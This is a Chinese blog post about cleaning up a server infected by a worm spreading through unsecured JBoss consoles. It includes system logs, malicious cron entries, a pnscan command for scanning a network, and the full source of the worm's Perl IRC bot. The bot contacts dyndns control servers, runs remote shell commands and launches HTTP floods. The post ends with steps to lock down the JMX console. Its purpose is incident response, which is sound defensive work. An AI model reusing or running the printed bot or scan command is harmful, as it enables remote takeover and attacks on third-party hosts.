JBoss漏洞导致服务器中毒,导致双机故障

最新推荐文章于 2024-08-07 08:59:08 发布
最新推荐文章于 2024-08-07 08:59:08 发布
阅读量1.8k 收藏
点赞数
分类专栏: Linux 文章标签: jboss 服务器 jmx authentication security access
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xyz846/article/details/7281243
版权

故障现象:

RHCS双机无故自动关闭,用clustat查看双机状态时,提示cman无法连接。

执行service cman start,提示启动fencing失败.

查看系统日志,发现一个异常进程javas

Feb 19 07:25:22 xx1 last message repeated 9 times
Feb 19 07:56:50 xx1 kernel: printk: 64505 messages suppressed.
Feb 19 07:56:50 xx1 kernel: Neighbour table overflow.
Feb 19 07:56:50 xx1 last message repeated 9 times
Feb 19 09:14:43 xx1 kernel: printk: 64505 messages suppressed.
Feb 19 09:14:43 xx1 kernel: Neighbour table overflow.
Feb 19 09:14:43 xx1 last message repeated 9 times
Feb 19 10:39:57 xx1 kernel: javas[11690]: segfault at 00007ffffd881000 rip 0000003c4827c366 rsp 00007ffffd87ded8 error 4
Feb 19 10:40:25 xx1 openais[17282]: [TOTEM] entering GATHER state from 12. 
Feb 19 10:40:25 xx1 openais[17282]: [TOTEM] Creating commit token because I am the rep. 
Feb 19 10:40:25 xx1 openais[17282]: [TOTEM] Saving state aru b6 high seq received b6 
Feb 19 10:40:25 xx1 openais[17282]: [TOTEM] Storing new sequence id for ring 11c 
Feb 19 10:40:25 xx1 openais[17282]: [TOTEM] entering COMMIT state. 
Feb 19 10:40:35 xx1 openais[17282]: [TOTEM] The token was lost in the COMMIT state. 
Feb 19 10:40:35 xx1 openais[17282]: [TOTEM] entering GATHER state from 4. 
Feb 19 10:40:35 xx1 openais[17282]: [TOTEM] Creating commit token because I am the rep. 

经查找javas文件,发现javas就的root目录下,并且有两个java进程调用这个文件。

用crontab查看定时任务,发现有几个异常的任务:

1 1 10 * * ~/.sysdbs
1 1 24 * * perl ~/.sysync.pl
1 1 10 * * ~/.sysdbs
其中.sysync.pl的内容为:
#!/usr/bin/perl
use IO::Socket::INET;  
my $time=time();  
$time=~/(.*)\d\d\d\d/;  
$i=int($1)*2; 
my $processo = "/usr/share/apache/bin/httpsd";  
my $pid=fork;  
exit if $pid;  




$0="$processo"." "x16;   




my @sops =("localhost","iscvadimswallows.dyndns.biz","webstatzz.twilightparadox.com","westatzo.dyndns-remote.com","suyeifd.dyndns.info","killbilll.twilightparadox.com","myfivecents.dyndns-web.com","its".$i."s.dyndns.info","itsthe".$i."d.strangled.net","eventuallydown.dyndns.biz","localhosting.dyndns.info"); 




my $port=2020*4;  
my $chan="#jbs"; 




my $boxing = `uname -a`;  
$user = `whoami`;  
$boxing =~ s/\r//g;  
$boxing =~ s/\n//g; 
$boxing =~ s/ //g; 
$boxing =~ s/\s//g; 
$user =~ s/\r//g; 
$user =~ s/\n//g;  
$user =~ s/ //g; 
$user =~ s/\s//g;    




while(1) {
 retry:
 my $nick="efd[".int(rand(999999999))."]";
 close($sk);  
 my $server = "";  




 while(length($server)<10) { 
$server = $sops[int(rand(12))]; 
 }




 sleep(3); 




 my $sk = IO::Socket::INET->new(PeerAddr=>$server,PeerPort=>$port,Proto=>"tcp") or goto retry; 
 $sk->autoflush(1); 




 print $sk "POST /index.php HTTP/1.1\r\nHost: $server:$port\r\nUser-Agent: Mozilla/5.0\r\nContent-Length: 385256291721361\r\n\r\nfile1=MZ%90%0a%0d\r\n";
 print $sk "NICK $nick\r\n";  print $sk "USER ".$user." 8 *  : ".$user."\r\n";  




 while($line = <$sk>)
 { 
$line =~ s/\r\n$//;




        if ($line=~ /^PING \:(.*)/)
{
print $sk "PONG :$1\r\n";
        }  




if($line =~ /welcome\sto/i)
{
sleep(2); 
print $sk "JOIN $chan\r\n"; 
sleep(1); 
print $sk "PRIVMSG $chan :UserName=$boxing\r\n"; 
}  




if ($line =~ /PRIVMSG (.*) :.rsh\s"(.*)"/)
{
$owner=$line;
      $de=$2; 

if($owner=~/iseee/gi)
{
@shell=`$de`; 
foreach $line (@shell) { 
sendsk($sk, "PRIVMSG iseee :$line\r\n"); 
sleep(1); 











if ($line=~ /PRIVMSG (.*) :.get\s"(.*)"\s"(.*)"/)
{
$owner=$line; 
$url=$2; 
$mult=$3;




      if($owner=~/iseee/gi)
{
$url=~/http:\/\/(.*)\/(.*)/g;   




for($xz=0; $xz<=$mult; $xz++) {
system("curl ".$url.">/dev/null&");
      `curl "$url">/dev/null&`; 
system("wget ".$url.">/dev/null&"); 
`wget "$url">/dev/null&`; 
system("wget $url>/dev/null&"); 
      }
sendsk($sk, "PRIVMSG iseee :Got $host/$path - $mult times\r\n"); 
}
}   




if ($line=~ /PRIVMSG (.*) :.post\s"(.*)"\s"(.*)"/)
{
$owner=$line; 
$url=$2; 
$ddata=$3; 

if($owner=~/iseee/gi)
{
$url=~/http:\/\/(.*)\/(.*)/g; 
$host=$1; 
$path=$2;  
      
my $sck=new IO::Socket::INET(PeerAddr=>$host, PeerPort=>80); 
print $sck   "POST /$path HTTP/1.0\r\n" . "Host: $host\r\n" . "Connection: close\r\n" . "Content-Length: ".length($ddata)."\r\n\r\n".$ddata;
      sleep(1); 
close($sck);   
 
sendsk($sk, "PRIVMSG (.*) :Posted $host/$path - $mult\r\n");

}  
 } 




 }  




 sub sendsk()
 { 
if ($#_ == 1)
{
my $sk = $_[0]; 
print $sk "$_[1]\n"; 

else

print $sk "$_[0]\n"; 
}
 }
经查找相关资料,发现这是一个利用JBOSS漏洞入侵系统的病毒。中毒后系统为多出几个java的进程,pns开头的进程.
sh -c ./pnscan -r JBoss -w "HEAD / HTTP/1.0\r\n\r\n" -t 6400 61.223.0.0/16 8080 > /tmp/sess_008802541
尤其是有pnscan这个进程,它会对外扫描整个网络,导致网络拥塞
/root/多出了好多文件,这些文件的owner为未知(比如为1000):
a.tar.gz
bm.c
bm.h
bm.o
flu.pl
fly.pl
install-sh
ipsort
kisses/
kisses.tar.gz
kisses.tar.gz.1
linda.pl
lindb.pl
Makefile
pnscan
pnscan.c
pnscan.o
version.c
version.o


解决办法:
http://aws.amazon.com/security/security-bulletins/jboss-worm-spreading-via-unpatched-or-unsecured-jboss-application-server/


修改:
1. kill 掉多出来的进程,另外killall perl,kill -9 crond,service crond restart。
2. 删除crontab 里面多出来的条目。
3. 删除root下面多出来的文件。
4. 删除${JBOSS_HOME}/server/all(default,minimal)/deploy/management/iesvc.war和zecmd.war文件。
5. 删除/tmp下面
5. 修改jboss配置:
一、JMX安全设置:
# vi ${JBOSS_HOME}/server/all(default,minimal)/deploy/jmx-console.war/WEB-INF/web.xml
   <!-- A security constraint that restricts access to the HTML JMX console
   to users with the role JBossAdmin. Edit the roles to what you want and
   uncomment the WEB-INF/jboss-web.xml/security-domain element to enable
   secured access to the HTML JMX console.
   -->
   <security-constraint>
     <web-resource-collection>
       <web-resource-name>HtmlAdaptor</web-resource-name>
       <description>An example security config that only allows users with the
         role JBossAdmin to access the HTML JMX console web application
       </description>
       <url-pattern>/*</url-pattern>
<!--
       <http-method>GET</http-method>
       <http-method>POST</http-method>
-->
     </web-resource-collection>
     <auth-constraint>
       <role-name>JBossAdmin</role-name>
     </auth-constraint>
   </security-constraint>
把GET和POST两行注释掉,同时security-constraint整个部分不要注释掉。


# vi ${JBOSS_HOME}/server/all(default,minimal)/deploy/jmx-console.war/WEB-INF/jboss-web.xml
<jboss-web>
   <!-- Uncomment the security-domain to enable security. You will
      need to edit the htmladaptor login configuration to setup the
      login modules used to authentication users.
   <-->
      <security-domain>java:/jaas/jmx-console</security-domain>
</jboss-web>
把security-domain注释去掉。


# vi ${JBOSS_HOME}/server/all(default,minimal)/conf/props/jmx-console-users.properties
# A sample users.properties file for use with the UsersRolesLoginModule
admin=xxxxx
修改admin密码


二、WEB-CONSOLE安全设置:
# vi ${JBOSS_HOME}/server/all(default,minimal)/deploy/management/console-mgr.sar/web-console.war/WEB-INF/web.xml
   <!-- A security constraint that restricts access to the HTML JMX console
   to users with the role JBossAdmin. Edit the roles to what you want and
   uncomment the WEB-INF/jboss-web.xml/security-domain element to enable
   secured access to the HTML JMX console.
   -->
   <security-constraint>
   <web-resource-collection>
   <web-resource-name>HtmlAdaptor</web-resource-name>
   <description>An example security config that only allows users with the
   role JBossAdmin to access the HTML JMX console web application
   </description>
   <url-pattern>/*</url-pattern>
<!--
   <http-method>GET</http-method>
   <http-method>POST</http-method>
-->
   </web-resource-collection>
   <auth-constraint>
   <role-name>JBossAdmin</role-name>
   </auth-constraint>
   </security-constraint>
把GET和POST两行注释掉,同时security-constraint整个部分不要注释掉。


# vi ${JBOSS_HOME}/server/all(default,minimal)/deploy/management/console-mgr.sar/web-console.war/WEB-INF/jboss-web.xml
   <!-- Uncomment the security-domain to enable security. You will
   need to edit the htmladaptor login configuration to setup the
   login modules used to authentication users.
   -->
   <security-domain>java:/jaas/web-console</security-domain>
把security-domain注释去掉。


# vi ${JBOSS_HOME}/server/all(default,minimal)/deploy/management/console-mgr.sar/web-console.war/WEB-INF/classes/web-console-users.properties
# A sample users.properties file for use with the UsersRolesLoginModule
admin=xxxxx
修改admin密码


最后启动jboss生效。

reboot system。

搞定。

xyz846
关注
专栏目录
jboss服务器上搭建Hibernate项目出现的validator问题解决办法
弱水三千,只取一瓢
09-08 1248
问题:同样的Hibernate项目在tomcat中部署后运行成功,但是部署在jboss-4.2.3.GA时发生以下异常: Caused by: java.lang.NoSuchMethodException: org.hibernate.validator.ClassValidator.(java.lang.Class, java.util.ResourceBundle, org.hiberna
jboss-服务器下载
06-29
通过使用JGroups和JBoss clustering模块,可以实现会话复制和故障转移,确保即使在一个服务器出现故障时,服务也能不间断。 然而,值得注意的是,JBoss AS 5.1.0.GA已经是较为陈旧的版本,当前Red Hat已经将注意力...
corosync 解决 [TOTEM ] Retransmit List: 问题
cudi7618的博客
08-01 659
在日志里发现了[TOTEM ] Retransmit List: 540 542 544这说明,corosync 丢掉了一些数据,这些数据又找回来了。虽然没有真正...
记一次数据库服务器中毒瘫痪恢复感受
fashion的博客
12-17 1468
         前阵子,满血复活数次,大战4天4夜,从11月6号早上中毒开始我司与现场IT对接召开紧急会议,响应一级故障,采取临时紧急预案,由于服务器上文件包括备份全部被勒索病毒Gandcrab5.0.4加密感染,部分服务器包括双机热备也遭遇瘫痪,唯一从移动硬盘找到最新的4月底的逻辑备份,通过这个恢复一个临时环境,姑且让业务能够先跑起来。另一方面找专业数据解密公司进行解密操作,解密只解密了部分数...
jboss蠕虫病毒清理步骤
黑太狼的专栏
08-26 1199
最近在好几台机器上都发现jboss的蠕虫病毒,其表现的现象为机器速度慢,无明显的主机登陆信息,在jboss主目录的bin目录下,出现以kisses.tar.gz开头的多个文件。目前应用不能升级jboss(测试未通过),只能暂时处理一下。      1、在jboss运行的用户下,出现病毒定时下载任务,通过定时任务将病毒文件通过wget下载后解压缩后运行。[root@localhost tmp]# c
Jboss】常见漏洞复现
m0_59151303的博客
08-06 1151
JBoss是一个基于J2EE的开发源代码的应用服务器JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
Jboss漏洞复现(附带修复方法)
最新发布
C233333235的博客
08-07 1216
JBoss是⼀个基于J2EE的开发源代码的应⽤服务器JBoss代码遵循LGPL许可,可以在任何商业应⽤中 免费使⽤。JBoss是⼀个管理EJB的容器和服务器,⽀持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核⼼ 服务不包括⽀持servlet/JSP的WEB容器,⼀般与Tomcat或Jetty绑定使⽤。在J2EE应⽤服务器领域, JBoss是发展最为迅速应⽤服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发, 这使得JBoss⼴为流⾏。
Jboss漏洞利用小工具
11-06
在过去的几年中,由于其广泛使用,JBoss也成为了黑客们的目标,存在一些安全漏洞,这些漏洞如果被恶意利用,可能会导致系统被攻击者控制、数据泄露或服务中断。本文将深入探讨JBoss漏洞利用及其防范措施。 1. **...
jboss反序列化漏洞检测工具
02-15
jboss中间件的反序列化漏洞检测工具,可检测主机搭建的中间件并获得shell
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
JBoss Application Server是一款广泛使用的开源应用服务器,由Red Hat公司维护。在2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行...
jboss漏洞getshell工具.zip
08-26
当一个 JBoss 漏洞被发现时,黑客可能使用这样的工具来尝试在目标系统上执行恶意代码,从而获取“shell”,即远程服务器的命令执行环境。这使得攻击者能够控制系统、窃取数据或进行其他非法活动。 在 JBoss 的历史...
部署到jboss服务器 中文乱码问题
feiyeguohai1的博客
07-05 786
最近项目中碰到一个问题:   问题场景:服务器A,服务器B在同一个CAS管理下,A向B发送一个包涵中文字符的链接,在B系统网页显示时中文显示乱码 问题分析:A向B发送链接时,因为用户没有登录B系统,B系统会重定向到CAS验证中心,在重定向过程中会把参数用URLEncode重新编一次码:             "中文" urlencode 后转化成  %E4%B8%AD%E6%96%87...
Linux使用PAM锁定多次登陆失败的用户(含重置错误次数)
热门推荐
新路的专栏
05-22 5万+
修改如下文件 /etc/pam.d/sshd    (远程ssh) /etc/pam.d/login    (终端) 在第一行下即#%PAM-1.0的下面添加: auth    required    pam_tally2.so    deny=3    unlock_time=600 even_deny_root root_unlock_time=1200 各参数解释: ev
cacti nagios nginx squid等怎么读?
新路的专栏
04-10 1万+
经常遇到这些单词,一直烦恼该怎么读?经查询读音如下: Cacti——['kækti] Nagios——[ˈnædʒiɔs]  Nginx——[ˌndʒinˈeks ]  Squid——[skwid] yum—— [jʌm]
linux下如何解压大于2G的zip文件
新路的专栏
03-13 7883
一般在linux下解压zip文件,直接用系统默认的unzip就可以进行解压。 可是如果压缩文件.zip是大于2G的,那unzip就无法使用了。这是由于C库中long类型数据所能表示的文件偏移在32位机子上只能有2G。 所以如果要解压大文件,需要使用7zip。 测试平台: SLES 10.3 安装软件:p7zip_9.20.1_x86_linux_bin.tar.bz2 (官网下载
LINUX批量杀进程
新路的专栏
05-10 6116
kill `ps -ef|grep 进程名|grep -v "grep"|awk '{print $2}'`  kill `ps -ef | grep /etc/pam.d/su |grep -v grep |awk '{print $2}'`
SecureCRT自动记录日志
新路的专栏
12-08 5620
工作中经常要远程操作服务器,时常忘记记日志,现在好了,SecureCRT每次可以帮我们自动记录日志,再也不用第次勾选日志了 1.首先勾选Options-->Auto Save Options 2.Options->Global Options 点击OK,下次就可以按主机、日期自动记录日志了。 参数说明: %H 主机名 %S 会话名 %Y 年份 %
"Jboss漏洞利用总结:访控不严导致漏洞
总之,Jboss作为一个开源的J2EE应用服务器,虽然被广泛应用,但也存在一些安全漏洞,其中包括因访问控制不严导致漏洞。要防范Jboss漏洞利用,需要加强对Jboss的安全性管理,包括及时安装最新的安全补丁、修改默认...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值